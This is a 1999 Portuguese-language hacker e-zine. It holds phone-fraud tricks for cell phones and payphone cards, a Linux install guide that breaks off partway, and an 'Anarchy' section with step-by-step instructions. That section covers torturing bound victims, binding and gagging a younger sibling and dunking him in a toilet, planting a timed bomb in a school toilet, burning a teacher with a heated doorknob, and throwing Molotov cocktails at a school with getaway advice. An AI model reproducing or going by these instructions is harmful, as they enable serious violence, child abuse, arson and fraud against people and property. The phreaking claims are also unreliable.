 ________________________
|                       |\                     
|                       | \                                
|                       | |                                          
|         ______________| |               
|        |\ _____________\|                               
|        | |                                  
|        |_|_____                  
|                |\           0RBIDDEN     
|                | |   
|        ________| |                                                
|       |\  ______\|   ________                                      
|       | \           /        |\                                          
|       |  |         /   ______| |                                         
|       |  |        /   /\______\|                            
|       |  |       |   / /                       
|_______|  |       |   \/                   0RPORATION      
\        \ |        \   \______                        
 \________\|         \         |\                        
                      \________| |           
                       \________\|

	
               _______________________________________
              |\_____________________________________/|
              | |   =-=-=-=- FC0RP ZINE =-=-=-=     | | 
              | |                                   | |  
              | |Mes: Abril / 99                    | | 
              | |Numero: 00 (Beta Version)          | |
              | |Get in : www.fcorp.cjb.net         | |
              | |Edited By: Bl4ck-D13 and ThAnAtH0s | |
              | |___________________________________| |     
              | /____________________________________\|


       _________-----_____  _-_ ---_-_
       _____------           __      ----_                                                    
___----             ___------              \       
   ----________        ----                 \      
               -----__                   ____)     
                    __-                /     \     
        _______-----    ___--          \ (0) /)    
  ------_______      ---____            \__/  /    
               -----__      --    _          /\    
                      --__--__     \_____/   \_/\   
                              ----|   /          |  
                                  |  |___________|  
                                  |  | ((_(_)| )_)  
                                  |  \_((_(_)|/(_)                                  
                                  \             ( 
                                   \_____________)

                          "Não Ha poder sem conhecimento"
                                     Nao sei o autor mais gostey da frase


        << Melhor Visualizado com os olhos...Versao desse zine em braile
                     ainda nao esta disponivel >>



                         ()================()
        =_=_=_=_=_=_=_=_=||  I N D I C E   ||=_=_=_=_=_=_=_=_=                           
                         ()================()  
  .________________________________________________________________________.
 /| ______________________________________________________________________ |                                                                       
|*||      1- Introducao........................................   FC0RP   ||          
|*||      2- Phreak00..........................................BL4cK-Di3  ||          
|F||      3- Anarchy...........................................ThAnAtH0s  ||      
|0||      4- Instalacao do RH..................................ThAnAtH0s  ||                                                                                
|R||      5- Estrutura e terminacoes do unix(basico)...........F0rBiDDeN  ||                                                           
|B||      6- 14m4h D0 M35......................................ThAnAtH0s  ||
|I||      7- Opiniao...........................................F0rBiDDeN  ||
|D||      8- C00l Infoz(Pequenas Notas)........................F0rBiDDeN  ||
|D||      *  Bonuz[1]..........................................Bl4ck-Di3  ||
|E||      *  Bonuz[2]..........................................ThAnAtH0s  ||
|N||      *  Bonuz[3]..........................................ThAnAtH0s  ||
|*||______________________________________________________________________||
|*|________________________________________________________________________|
|/________________________________________________________________________/


   
                        $================$ 
   ////////////////\    | 1- Introducao  |   /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $================$   \/////////////// 
   

AE galera estamos na edicao 00! Vamu ver se esse zine dah pe.....espero que
nao morra logo na primeira edicao...esse primeiro zine tah bem fraco mesmo,
mas com a ajuda de voces vamu melhorando o zine, qualquer boa materia e bem
vinda,mais estamos prescisando sobre mais de cracking e programming jah que 
temos otimos programadores aqui na corp (Velhinho, NepTunus e Bl4ck-di3).
Naum sei se voces vaum gostar dessa edicao pois e minha primeira experien
cia em zines.Chega de bla bla bla e vamu cumeca logo.Kker coisa e mail uz. 

   Editores:
  
- Bl4ck-di3   E-mail: bl4ck-di3@usa.net
- ThAnAtH0s   E-mail: thanath0s@brasnet.org


 
                          

                        $================$ 
   ////////////////\    | 2- Phreak00    |   /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $================$   \/////////////// 
                        
                     

		     P
	           H
		  PH R EAK
                 E
                 A
		     K  Rulizz
				              00 by bLacK-Di3

y0 brother'z, essa edicao (00) vai ser apenas sobre o Burlamento de Orelhoes/Celulares.
Xega de papu furado e da uma olhada na materia ...



========================== [ INDICE ] =======================================
=============================================================================
=================== *   I- Conceitos Basicos   ==============================
=================== *  II- Celulares           ==============================
=================== * III- Orelhao             ==============================
=================== *  IV- Tkz                 ==============================
=============================================================================				
=============================================================================

				 			
>>>>>>>>>>>>>>>>>>>> [ I- Conceitos Basicos ] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
			


Ao contrario do que muita gente pensa, os fios da linha telefonica possuem uma tensao continua
equivalente a -48 volts. Esta tensao se altera para um valor alternado de 96 volts quando o 
telefone toca. Portanto, ao lidar com os fios do telefone, tenha o cuidado de nao encostar no 
orelhao, na parede, ou em qualquer coisa que possa 'aterra-lo'. Este cuidado deve ser redobrado
se o telefone for comunitario ou residencial. Levemos tambem em consideracao que se o aparelho
possui uma tensao continua, significa que ele tem tambem uma polarizacao correta
(fio positivo e fio negativo). Na instalacao do aparelho esta polarizacao nao faz diferenca,
mas quando o assunto eh violacao, ela deve ser observada.

Existem dois tipos de linhas telefonicas: 

1) Decadicas/Pulse - Linhas dos prefixos mais antigos do sistema telefonico.
                     A identificacao de chamadas se dah atraves de uma serie de sinais
                     (pulsos), que sao interpretados pela central telefonica.

2) Multifrequenciais/Tone - Linhas dos prefixos mais novos onde trabalham o servico de CPA
                            (Central telefonica com controle por Programa Armazenado).
                            A identificacao de chamadas se da atraves da decodificacao de tons
                            frequenciais em numeros.  

===============================================================================================

>>>>>>>>>>>>>>>>>>>>>>>>> [ II- Celulares ] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
				


% Escuta Celular


- Material

§-§ Papel Aluminio
§-§ Bateria de Celular(BaH)
§-§ Aparelho Celular (BaH)

- Como Fazer

#1- Solte a Bateria do Celular.
#2- Depois de soltar pegue o aparelho e repare nos 3/4 riscos de metal(Ilustracao) que tem na parte
    inferior a direita do aparelho.
#3- Pegue um Pedaco de Papel Aluminio e ponha ele em cima nos 3/4 riscos de metal(Ilustracao).
#4- Prenda a Bateria novamente ao aprelho e ligue o Celular.
#5- Repare q algumas coisas 'eskizitaz' podem acontecer, apoz isso digite #1008# e comece a Escuta.

- Ilustracao

				

	         OO
	          \\
                   \\
                     \\
                       \\
			 .-\-----_|-|_--\-.
                         | \              |
                         \  \               \
                          \  \               \
			   \  \               \
			    \  \               \             
			     \  \               \
			      \  \               \
                               \  \               \
                                \  \        ||||  \
                                 \.-\_____________|
                                             /\
                                             ||
                                             ||
                                    Parte Metalica (huahauha)


% Pagando a metade


- Material

§-§ Aparelho de Celular MOTOROLA

- Como Fazer

#1- Ligue o Celular
#2- Pressione FNC
#3- Digite 0000000 4
#4- Pressione STO
#5- Agora q sua Sequencia foi 'Completa' vc pagaram metade do preco por kda Ligacao ;)


% Ligando Gratuitamente



- Material

§-§ Aparelho de Celular

- Como Fazer

#1- Ligue o Celular
#2- Do ultimo algarismo do numero a ser discado e subitraia ele de 10
#3- Ex.: (9998-2569)=(9998-2261)
#4- Agora Faca sua Ligacao de Graca ;)


=============================================================================


>>>>>>>>>>>>>>>>>>>>>>>>> [  III- Orelhoes  ] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
				   
Botei Abaixo alguns modos de 'burlar' seu Cartao Telefonico, foram apenas testados nos
orelhoes da TeleRJ e TeleSP

------- ESMALTE -------


- Material

§-§ Esmalte(Base)(Trasparente)
§-§ Cartao Telefonico NOVO

- Como Fazer

#1- Pegue o Cartao NOVO.
#2- Espalhe o esmate na parte de traz deixando ela totalmente 'esmaltada'.
#3- Enfie a porra do Cartao que jah esta totalmente 'esmaltado' no orelao e Fique c/
       Unidades 'Infinitas'.


------- Papel Aluminio -------


- Material

§-§ Papel Aluminio
§-§ Cartao Telefonico

- Como Fazer

#1- Pegue o Cartao e o Papel Aluminio.
#2- Envolva o Cartao c/ o Papel Aluminio o deixando bem 'colado' no cartao e 'cortando'
       todas as pontas de Aluminio que talvez tenham sobrado.
#3- Enfie a porra do Cartao que jah totalmente envolvido pelo Papel Aluminio no orelhao
       e fique c/ unidades 'Infinitas'.
#4- Caso o cartao n entre eh pq vc n fez oq eu falei na Parte 2, MONGOL!


------- Moeda -------



- Material

§-§ Moeda
§-§ Cartao Telefonico de 50 unidades

- Como Fazer

#1- Pegue a Moeda e o Cartao.
#2- Raspe a parte de traz do Cartao c/ a Moeda deixando ela totalmente 'raspada'
#3- Repare nuz 'circuitoz' na parte de traz.
#4- Enfie a porra do Cartao que jah esta totalmente raspada no orelhao e Fique c/
       Unidades 'Infinitas'.


------- Grafite n 06 -------



- Material

§-§ Grafite n06
§-§ Cartao Telefonico de 50 unidades

- Como Fazer

#1- pegue o Grafite e o Cartao.
#2- Rabiscada a parte de traz do Cartao c/ o Grafite.
#3- Apoz deixa-la totalmente rabiscada retire o excesso de 'poeira' do Grafite.
#4- Enfie a porra do Cartao que jah esta totalmente rabiscada e fique c/ Unidades 'Infinitas'.


------- Tecla n 9 -------



- Material

§-§ Cartao telefonico

- Como Fazer

#1- Ligue p/ o numero desejado c/ a porra do cartao jah enfiado no orelhao.
#2- Apoz completar a ligaçao retire a porra do cartao e aperte o n 9 e fique segurando.
#3- Depoiz disso vc vai conseguir ficar +/- 5 minutos falando sem Cartao.
#4- Caso vc perceba que o volume esta diminuindo ponha o cartao e faca tudo novamente...

=============================================================================================

>>>>>>>>>>>>>>>>>>>>>>>>>>  [ IV- Tkz  ]  <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
                   

Tah aki o Fim da Edicao 00 do 'Phreak rulizz' e ateh a proxima Pessual...


By.
			__				  __
		     //				  \\
				bbbbbb   dddddd
				bb   bb  d    dd
				bbbbbb  =d==   dd
				bb   bb  d    dd
			\\	bbbbbb   dddddd    //
			 ¯¯	¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯	   ¯¯

						(bL4cK-Di3)

 
                           
                        $================$ 
   ////////////////\    | 3- Anarchy     |   /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $================$   \/////////////// 

                  



       ¤-/\/\/\-~~~~~~~~()++++++++++++++++++++()~~~~~~~~-/\/\/\-¤
       |××××××××××××××××||                    ||××××××××××××××××|
       |××××××××××××××××|| [ ANARCHY PARTE 1] ||××××××××××××××××|
       |××××××××××××××××||                    ||××××××××××××××××|
       ¤-/\/\/\-________()++++++++++++++++++++()________-/\/\/\-¤ 



E ai cAmbada, voltei resolvi agora escrever uma materia sobre AnArChY , YEaH!
ThiZ R0x! Isso mesmo Anarquia , eu sou um anarquista!! (Hehehehe o diretor do 
colegio tb disse k eu era uma anarquista,  ele tinha razao :þ) Sim mas tambem 
nao sou daqueles anarquistas lammers que faz uma bombinha se fode e ai vai
reclamar com o criador do texto.Portanto aviso **  FACA SUAS PORRAS E ASSUMA
SEUS ATOS, SE VC FIZER ALGUMA CAGADA E SE FUDER NAO VA RECLAMAR COMIGO ,TAH 
AVISADO E SE ReCLAMAR EU VO MANDA TOMA NO CU!  **  Entao se segure que a 
anarquiva vai comecar!
 
Ei voce!!!Eh vc mesmo seu lammo!Espere ai porra, antes de continuar a ler
,fazer anarquia e sair por ai gritando "Eu sou anarquista!!" e fiacar de
senhado o simbolo nas carteiras do colegio, leia a introducao abaixo....
a ANRQUIA por si mesma . Que foi escrita por um grande amigo meu,Obrigado
SoCraTes!!!!!!


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=   


                      AGORA A ANARQUIA POR ELA MESMA 

    Nao pensem voces ,leitores que ser anarkista e só destruicao!
Ser um anarkista hoje basicamente significa destruir,destruir e destruir.
Mas nao ache que eh so de destruicao que vive um anarquista!
    Tudo comecou quando uns russos,muito doidos por sinal comecaramm a ver ...
E viram, um novo sistema em que  todos viveriam em plena harmonia,em outras 
palavras, uma utopia!alguns grandes escritores do assuntoo foram proudhon, 
Bakunin e Kropotkin. Eles pregavam a ideia de que se cada um fizesse a sua 
parte nao seria necessario termos LIDERES(DITADORES),ARGHT! se tivessemos 
dado ovidos a eles, hoje um boquete de uma mulher no presidente dos EUA(FuCkInG
Us!!) nao seria tao famoso.... E vcs sabem porque??? pq os EUA nao seriam os 
fdp que mandam na porra toda e fazem o que querem so pq acham que botam pra fuder
     Um lider so EH o K  é pq uns otarios babam seu ovo,ele dificilmente sera
deposto!Fazendo isso eles conseguem seus objetivos e ainda sao ADIMIRADOS!!!
(Mas eu nao me refiro aos lideres que comandam e sim aqueles que mandam,os 
DITADORES) em resumo : FACA SEMPRE O QUE VC ACHA QUE EH CERTO, NAO INTERESSA
O QUE OS OUTROS POBRES SERES ALIENADOS PENSEM OU MANDEM ,MAS FACA O CERTO!!! 
Todos aqueles que costumam tomar essa atitude sao na maioria das vezes 
excluidos do grupo de convivio normal ou sao adimirados e do mesmo jeito 
excluidos(experiencia propria). So que os diferentes sempre sao considerados 
como moscas,que atrapalham e por isso devem  ser esmagadas(citacao de Platao 
em seu dialogos perdidos quando Socrates foi obrigado a beber um calice de
cicuta por aqueles a quem tinha humilhado).As "moscas" que sobrevivem sao 
entao tratadas com respeito,tb pelo fato de o ser humano achar tudo que eh
estranho  perigoso e por isso passam a respeita-lo! Tente algumas vezes em 
sua vida tomar atitudes realmente anarquistas,nao simplesmento destruindo tudo
e achar que ta botando pra fuder mas fazendo a sua parte ao tentar acabar
com as REGRAS outorgadas pelos manda-chuvas ,que nem querem saber se vc quer
realmente segui-las!
           


Acho que com isso ja deu para ter + ou - uma ideia do que o anarquismo foi
em sua essencia,um sonho de uns caras que imaginaram a sociedade perfeita,
mas somente no dos SONHOS!!!!

Agradecimentos:
* A papai que me tirou do sistema. 
* A Mamae que me botou nele.
* Aos caras que estao Hackeando por ai.
* A socrates que botou pra fuder em sua epoca,
* A ThAnAtH0s que nao me mostrou nenhum exemplar desse zine mas pediu que eu 
o ajudasse na materia e eu so o fiz pq ele eh brother meu desde a 3 serie 
quando a gente ainda era guri.
* Aos  "RANSONS" que sao o melhor exemplo da lavagem mental que os poderosos
fazem nos seres normais. 
* A a XUXA que soube usar muito bem sua buceta pra chegar onde chegou!!!
 
          
Bem galera se vc s querem saber um pouco mais sobre essa porra E-MAIL ME !!!
 E-mail:aryon@svn.com.br

VALEU e ATE A PROXIMA

SoCraTes

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



1.) ALGUNS METODOS DE TOTURA

Ps: Alguns metodos foram testados e outros nao...portanto cuidado ao praticar
esses atos, pois podem lenhar com o SyS NervoSo da vitima.

 # DORZINHA FDP

Voce pega a vitima amarra ela todinha mas ela tem que ficar bem amarrda, mas 
muito bem amarrada pra nao mecher nadica de nada.E vc prescisara de algumas
coisas listadas abaixo ( vc com certeza tem em casa )

******* MATERIAL ********

× Agulha de costura bem fininha 

× Vela 

× Corda, Barbante ou algo parecido 

× Fita Crepe ou algo mais resistente

Apos ter amarrado, a vitima todinha cubra ela  com Fita Crepe (hahahaha
ela vai ficar parecida com uma mumia, so deixe do lado de fora  a cabeca e 
umas das maos e ums do antebracos) Agora vc pega a agulha e na ponta onde vc 
vai segurar passe um pouco de fita crepe na ponta pra vc nao se queimar,agora
acenda a vela e comece com a tortura...... pegue a agulha e esquente durante
meio ou um minuto ( Se vc quiser deixar mais pode,ai fica a criterio do carra
sco) e enfie em uns dos poros da mao do cara, mas enfie bem no meio, rapaz 
quando a agulha toca na pele eh uma dor muuuuuuuuuuuito FDP, o cara vai falar
tudo, hahahaha o cara vai falar tudo e mais um pouco.



 # GOTEIRA

 Esse metodo de trotura foi criado pelo alemaes na epoca do nazismo , eles 
usavam isso contra os judeus para pegar informacoes importantes tipo onde 
eles escondiam ouro, joias e tal.Esse metodo tambem foi usado na guerra do
vietna e por isso que os US(FuCkInG Us!) disseram que eles que inventaram. 
Esse metodo eH muito eficaz,mas se o cara ficaR muito tempo sendo torturado, heheheh omalUco ficaRa doidin, doidin mesmo....o SyS NeRvOsO delle vai pro liXo hehehhe.



Esse metodo de tortura eh legal porque nao se prescisa de muita coisa naum ,
basta vc ter uma pia, mas recomendo usar  a pia da area de servico.....Esse 
metodo consiste em (Como Sempre)Amarrar a vitima tOdinha e deixar a Torneira 
mal fechada... e mirada pra bem na testa pra quando a gota cair escorrer ateh
pelo olho...ai vem aquela gotinha pim, pim ,pim ,pim ,pim,pim de pois de 
muitos outros pins(uns 5 minutos) O cara jah fica todo agoniado e conta alguma coisa, mas se o cara for muito "casca grossa" ou vc quiser saber mais espera mais 5 minutos com, 10 min. os pins vao parecer bombas na testa delle,o cara pode ser ateh ninja,vai contar TUDO que vc quiser, mas atencao ve se nao sacaneia com cara,depois de20 a coisa comeca a complicar....imagine em algumas horas?? ( "Se na casa tem goteira pinga ni mim, pinga ni mim" uhauhauauhauhauhauha )


# TIAZINHA 


hehehehe esse metodo de tortura nao eh muito eficaz  pra pegar informacao
mas se vc quiser sacania... eh engracado... primeiro vc pega  a vitima e 
amarra os membros(Bracos e Pernas) nas pernas da cama ou maca  e ai vc pega
um monte de fita crepe(ou algo + forte)  e bota nas pernas e nos bracos do 
cara e vai puxando.com muita forca...mas ai se vc quiser se vestir com
langerie e tal ai sao outros 500 ( eu nao recomendo).

=-=-=-=-=-=- [ VEJA O MODO MAIS DOLORIDO DE "DEPILACAO" ]=-=-=-=-=-=-=-=-=-=- 
 




Ex1: Voce tem que puxar pelo sentido contrario dos pelos do coitado.


      |||=======[ PUXE POR ESSE SENTIDO ]================>>>>>>           


 /////////////////// AQUI EH O PELO DO COITADO////////////////////////////
//////////////////////////////////////////////////////////////////////////
---------------------------------------------------------------------------
--------------- AQUI EH A EPIDERME (PELE) DO COITADO-----------------------
---------------------------------------------------------------------------


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Ex2: Voce tem que puxar pelo sentido contrario dos pelos do coitado.


      <<<<<=======[ PUXE POR ESSE SENTIDO ]================||||||           


 \\\\\\\\\\\\\\\\\\\\ AQUI EH O PELO DO COITADO \\\\\\\\\\\\\\\\\\\\\\\\\\
  \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
---------------------------------------------------------------------------
--------------- AQUI EH A EPIDERME (PELE) DO COITADO-----------------------
---------------------------------------------------------------------------


# ESCROTAO 

Esse metodo tb nao eh muito eficaz pra tirar informacao nao, mas se vc quiser
sacania muito com o cara...... vc pega o sacana enche cachaca ateh o cara cair de mete num quarto com varios eletrodomestocos ligados,Liga o liquidificador,liga a tv no Silvio santos e no faustao no ultimo volume, bota um cd do Amado Batista no ultimo volume e deixa o cara trancado no quarto a tarde todA...hahhahahaha se o cara nao desmaiar ele vai sair zonzao!!!!!! hahahahahahahahahaha(Ps: Amarra o Cara!!!!)





2.) SACANAGENS COM IRMAOS

Porra ter irmao eh muito xato, eh uma merda eu ainda tive a falicidade de ser
mais velho ai eu posso espancar os outros....



# MUMIA 


Sabe quele seu irmao escroto, aquele guri que enche o saco? Sacaneie c ele
quando seus pais sairem em um dia de tarde... arrume algumas cordas e/ ou 
barbantes e amarre o sacana deitado e depois pique um pano de chao(isso mesmo
pano que se usam pra limpar a cosinha e tal) na boca delle pra ele nao ficar
falando merda ou implorando p vc largar ele (nao va te pena do sacana nao 
porque ele faria pior com vc se tivesse chance), depois do guri tah todo 
amarrado pegue uma fita crepe de cor cinza, eu esqueci o nm ,mas ela eh muito
resistente (o seu valor maximo eh de R$5,00 )pegue o sacana e enrole ele 
todo, hahahaha ele vai ficar parecendo uma mumia Egipcia hahahahahahah, 
enquanto o lerdo se contorce entre as cordas e a fita , va ve algum filme
no cinema ou ateh mesmo va ve sesao da tarde ou Cinema em casa, mas NUNCA 
olhe pro seu irmao que vc sentira pena, meia hora antes de seus pais chegarem
solte o guri e finga que nada aconteceu, se o guri encanar pro seus pais
sempre NEGUE!!! E diga que seu irmao tah vendo muito teletubies e ficando
maluco...eheheheh isso sempre funcionou comigo :þ



# O MERDINHA 


Se o metodo dai de cima nao funcionar e o bostinha ainda sacanear com vc, 
faca o obvio mande o bosta descarga a baixo....nao nao va joga seu irmao
pela janela( se bem que isso eh interessante, mas eh sacanage e ele pode 
morrer..e ai quem vc tera pra sacania?)pegue-o e amarre suas maos,m as tem
que ser bem amarrado, e bote ele de joelhos meta a cara do merda na latrina
e de descarga.......faca isso umas tres vezes mas se o guri ou vc for muito
escroto pode da descarga umas 10 vezes...depois disso arrume um bom Anti-verme porque o sacaninha vai estar todo bixado.



# DO JEITO QUE VEIO AO MUNDO 

Esse metodo eu ja testei mais qundo eu estava com muuuuuuuita raiva mesmo, e 
quando meus pais estavam fora, mande o sacana tirar a roupa e sair de casa
se ele nao quiser pegue e tire a forca, quando ele tiver peladao, todo pelado
vc bota ele pra fora de casa, se vc morar em casa vai ser mais engracado aindaSe irmao vai ficar um tempao co raiva de vc, mas depois passa hheheheheheheh



3.) ANARQUISANDO NO COLEGIO 

Hhehehhe essa e  a parte que eu mais gosto, eu adoro sacaniar no colegio, 
porque lah tambem tem alguns sacanas iguais a mim.


# BOMBA NO BANHEIRO 

 Esse eh bem legal...pegue uma bomba feita por vc ou vc pode comprar uma,
faca um  pavio ou faca um TIMER com cigarro(se vc nao souber nao perca a 
proxima edicao) e deixe dentro da descarga, mas sem molhar eh claro como
um cigarro normal sem ser dragado leva uns 15 a 20 minutos para queimar
todo, bote a bomba uma hora antes do recreio ou bote pra bomba explodir 
depois do recreio, com gente na sala eh mais legal, hehen causa mais 
panico (e tenha cuidado pra nao machucar ninguem viu porra!!!)No minimo
o gay do diretor do colegio vai suspender as aulas pra investigar hehehe
tem vezes que chega policia e tudo!Eh bem legal!!!!!




#SACANIANDO COM O PROFESSOR


Sabe aquele seu professor fdp ,tirado a bom, prepotente, etc,etc,etc...
sacaneie com ele, ele merece, a aula tem que ser depois do recreio, ai uns 10
minutos antes do sacana vim vc e mais dois amigos fazem o segunte.....vc e o 
seu amigo 1,cada um com um isqueiro na mao vai pega e eskenta,eskenta,eskenta
eskenta a macaneta pra caralho,e  o terceiro tem que ficar de olho nos fiscaise de olho nos colegas tb pra ele nao se fuderem, ai eskentou?? pronto feche aporta ums10 metros antes kdo ele estiver vindo, ai quando el for pegar a macaneta...vc so ouve o gritao -AIIIIIIIIIIIIIIIIII!!!!!! heheheh ele vai correndo pra enfermaria.Hehehehe esse eh muito legal, mas vc tem que arranjar amigos de confianca e malucos.


# SACANIANDO O DIRETOR

Eu detesto o diretor da minha escola ele eh um viado fdp ladrao que da cu!!!
Se vc tem odio mortal por seu diretor faca o seguinte...pegue no muro branquinho do colegio e escreva em vermelho "O DIRETOR EH NAZISTA!!" Eehehehhe vc vai ver vai sair no jornal e as porra!, mas se vc nao quiser pixar o muro do colegio(ou for medroso d+), durante o recreio pegue um giz (de preferencia vermelho) molhe bastante deixe bem molhado, vai ficar parecendo uma pastinha, aivc pega e escreve bem grande no quadro negro "O DIRETOR EH NAZISTA"(de preferencia escreva no lugar do DIRETOR o nm delle)Ex: ROBSON EH NAZISTA!!!!

Ps: Ve se lava as maos bem lavadas...que eles verificam mao por mao!!!!!


#DANOS MATERIAIS 

Bem, vc quer causar um bom dano material no seu colegio??Se as bombas nos
banheiros nao te deram o tesao que vc merece escute isso...heheh vc prescisara do seus amigos maluquinhos denovo heheheh....vc prescisara de +/- ums 3 coqueteis molotovs(se vc nao sabe como fazer um aprenda na proxima edicao)vc tera que ser bem rapido e cuidadoso....vc tera que ter tres amiguinhosmalucos...um pra dirigir o carro de "fuga" e os outros dois para jogarem os coqueteis...vc para na frente do colegio(nao faca isso em colegios perto de apartamentos pois os porteiros podem ver e tal)acende os coqueteis e jogamas tem que ter uma boa mira e jogar bem no portao, hehehehe e ai depois vc entra no carro e se pica, mas o motorista nao pode estar muito exaltado nao pra nao sair correndo em alta velocidade, ele tera que sair como uma motorista "normal".

Ps: ve se acorda e cobre o xassi do carro com papel preto ou algo preto,mais
 adiante um pouco longe do colegio vc tira o papel e volta pra casa, no outro
 dia ve se nao passa pelo portao do colegio dando risadaa viu??

=-=-=-=-=-=-=-=-=-=-=- [ ANARCHY PARTE 2 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) Aprenda a fazer as  principais  Bombas 
2.) Como fazer timers,pavios, polvora e etc
3.) Make your own weapons  **SAP** Faca suas proprias armas

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Duvidas , perguntas e tal E-Mail:  thanath0s@brasnet.org 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                     EspEcIaLZ ThAnKSz To:

   1.) Minha mamaezinha linda que me aguentou por todos esses anos. :þ~~.
   2.) Ao meu grande amigo SoCraTes..um cara muito gente boa que fez o texto
       da introducao dessa materia.
   3.) Todos os membros da  Fcorp.







                        $====================$ 
   ////////////////\    | 4-Instalacao do RH |   /\\\\\\\\\\\\\\\
   \\\\\\\\\\\\\\\\/    $====================$   \/////////////// 




0.) INTRODUCAO 
     Bem galera, primeiro eu gostaria de agradecer a Minha mamae que todo esse
tempo pagou a conta telefonica e reparou umas cagadas que eu fiz ai e Depois
ao pessoal da FCORP.Acabando com a baboseira de Agradecimentos, deixe eu contar minha
triste historiA, eu comprei o linux e fiquei num euforia danada, POw! Eu tenho
o Linux, mas depois de algumas horas eu de dei conta de uma coisa, eu nao sei
Instalar o Linux!! Ateh Aquele dia eu so tinha material sobre o Linux(Tipow
comandos basicos, como conectar a net e tal) , mas nao tinha nada sobre como
instalar o linux,comecei a procurar pela net, mas so tinhas coisas sobre o
Slackware, e os que tinham sobre o Red Hat era mEio ''pobres'', ai eu resolvi
instalar esse negoco na ''tora'' mesmo , fiz muitA cagada, formatei o computador 
umas tres vezes e depois perdi os drives, foi uma merda! Depois de muita 
cagada, muita porrada eu aprendi a instalar (Depois da Tempestade vem a 
Abonancia) e como sou uma adepto a informacao livres resolvi botar isso
nesse zine.Chega de bla bla bla e leia logo essa materia
PS: Oia eu nao copiei isso ne nada e nem de ninguem,fiz isso de cabeca mesmo
entao eu posso ter me esquecido de alguma coisa, sou humano tb neh POw!

ThAnAtH0s 

/\/\/\/\|COMO INSTALAR O LINUX RED HAT NUM HD C RUINDOWS95/98 (FAT32)|\/\/\/\/

    Para instalar o Linux junto COM O Win95(fat32) você  precisará do programa 
Fips20 , o fips que tem dentro do CD-ROM no diretório DOSUTILS NÃO  eh pra 
fat 32 . O programa FIPS20 se encontra em http://www.igd.fhg.de/~aschaefe/
fips.

1.) O QUE O FIPS FAZ??

    Ele divide seu hd ao meio(portanto você deve Ter seu hd com a memória  
MENOS da metade usada)assim você pode instalar o Linux sem se preocupar com 
seu Ruindows nojenta e cinco.

AGORA PROSSEGUINDO COM A INSTALACAO:

Bem primeiro você vai Ter que fazer um disco de boot, se você comprou da 
conectiva o Linux Red Hat completo não precisará pois nesse pacote há o 
disco de boot e custa em media R$ 49 (Quarenta e Nove Reais), mas se você 
comprou só o CD-ROM que custa em media R$ 16 (Dezesseis  Reais),R$10(Dez 
Reais)na mao de um Warezer você terá que fazer seu próprio disco de boot.

2.) FAZENDO SEU PROPRIO DISCO DE BOOT:



Vá no CD-ROM no diretório Dosutils e execute o AUTOBOOT.BAT( Lembre-se que
 esse  procedimento  deve  ser  feito em MS-DOS)
¡=========================== JANELA DO DOS =================================¡
| C:\>D:                                                                    |
| D:\>CD \DOS UTILS                                                         |
| D:\DOSUTILS>AUTOBOOT.BAT                                                  | 
|                                                                           |    
³===========================================================================³                                                                            


Depois de Ter feito seu disco de boot reinicie sua maquina ( CTRL+ALT+DEL) 
 Com o disco de boot no seu devido driver(Oia seu lammah nao va apertando
RESET na tora nao viu?)

Depois de acionado o disco de boot aparecera uma tela tipo assim:

¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|() Para instalar ou atualizar um sistema com Red Hat Linux >=2.0 ou CRHL   |
| Parolin, pressione a tecla <enter>                                        |                                   
|                                                                           |     
|() Para habilitar o modo expert digite : expert <enter>                    |    
|                                                                           |    
|() Para usar estes discos para manutenção/recuperação do seu sistema       |  
|digite: rescue <enter>                                                     |
|                                                                           |
|F1(principal)F2(geral)F3(expert)F4(rescue)F5(kickstar)F6(kernel)           |
|                                                                           |
|Boot:                                                                      |
|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³


- Aperte enter logo

Depois vai aparecer essa mesma tela com algumas coisinhas diferentes.
¡+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++¡
|() Para instalar ou atualizar um sistema com Red Hat Linux >=2.0 ou CRHL   |
| Parolin, pressione a tecla <enter>                                        |                                   
|                                                                           |     
|() Para habilitar o modo expert digite : expert <enter>                    |    
|                                                                           |    
|() Para usar estes discos para manutenção/recuperação do seu sistema       |  
|digite: rescue <enter>                                                     |
|                                                                           |
|F1(principal)F2(geral)F3(expert)F4(rescue)F5(kickstar)F6(kernel)           |
|                                                                           |
| Boot:                                                                     |
|Loading initrd.img.......                                                  |
|Vmlinuz.................                                                   |                                                                   |
³+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++³
Vai perguntar em que lingua vc quer instalar o linux.
Vc escolhe em portugues eh claro, a nao ser que vc queira em espanhol 
ou em ingles.
¡++++++++++++++++++++++++++++++++++++++++++++¡
|                                            |                        
|  PORTUGUES(BRASIL)  <====#  Esse eh claro  |   
|  ESPANOL                                   |
|  ENGLISH                                   |
|                                            |
|                                            |
³++++++++++++++++++++++++++++++++++++++++++++³




Depois disso vão aparecer um monte de perguntas idiotas tais como:

1.) SEU MONITOR EH COLORIDO?: BAH!!!!!!!!!!!!!!

2.) CONFIGURACAO DO TECLADO : US ACENTOS

3.) SUPORTE A PCMCIA?:ESCOLHA ''NÃO'' A NÃO SER SE VOCE ESTEJA USANDO UM PC 
